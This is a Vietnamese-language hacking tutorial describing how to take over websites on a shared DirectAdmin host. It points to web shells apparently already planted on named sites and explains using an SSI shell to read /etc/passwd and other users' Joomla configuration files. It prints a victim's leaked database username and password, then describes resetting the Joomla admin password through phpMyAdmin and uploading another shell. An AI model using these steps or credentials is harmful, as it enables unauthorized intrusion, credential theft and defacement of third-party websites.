Trước tiên là cần shell :
http://hyundaicounty.com/images/vic.php< victoria
Không cần để ý tới hàm nó disable bao nhiêu, nhìn vào cái server là được ( dựa theo kinh nghiệm local )
vào check-host.net > check hyundaicounty.com > info
Sẽ ra : Host name ln03.bsg.vn < nó chạy sv bsg
BSG quẩy tốt, sv chạy direct thì chắc chỉ ngại bkns và powernet ( powernet bởi vì ngày trước mình có contact lỗi này cho bên đấy nên nó fix hết quá nhọ
Bây giờ check quyền Server: - id: () - uid= () gid=603() < đủ quyền
Safe_mode : On < không có quyền thực thi lệnh, nhưng không sao bởi vì đối với những sv chạy direct ta chỉ cần hạ quyền xuống apache, chứ đừng thằng nào dại mà symlink sv chạy direct nhé
Khi đổi sang chạy shell = ip/~user thì nó sẽ tự hạ quyền xuống apache, nhưng chắc chắn sẽ không chạy được shell php hoặc perl, nhưng không sao shtml, html vẫn chạy tốt
Giờ ta up 1 con shell shtml lên, và quẩy thôi
http://123.30.181.39/~otohncom/images/ssi.shtml ?
Kiểm tra quyền : id
Sẽ được : uid=101(apache)gid=501(apache)groups=501(apache),503(access)
Quyền đã được hạ, bây giờ ta dùng dir or cat
dir : lệnh xem thư mục trong linux
cat : lệnh xem file trong linux
Xác định victim thực thi lệnh : cat/etc/passwd hoặc cat/etc/virtual/domainowners < đối với server chạy DA
Ví dụ victim : gvth.net user là : vannhan
ta sử dụng : dir -ao/home/vannhan/domains/gvth.net/public_html < để xem thư mục public_html của victim
Tiếp theo tìm config < chưa user pass database của victim
Victim chạy joomla > config sẽ là > configuration.php
Ta sử dụng : cat/home/vannhan/domains/gvth.net/public_html/configuration.php để view source của file configuration.php
Sẽ ra db là :
var $user = 'vannhan_vannhan';
var $db = 'vannhan_dulieu';
var $password = 'WQUnkOZe';
Bước tiếp theo là connect tới mysql bằng
http://123.30.181.39/phpmyadmin< chỉ đối với sv chạy DA mới có nhé
Change pass joomla bằng md5 > login vào admin của victim và upload shell
End Tut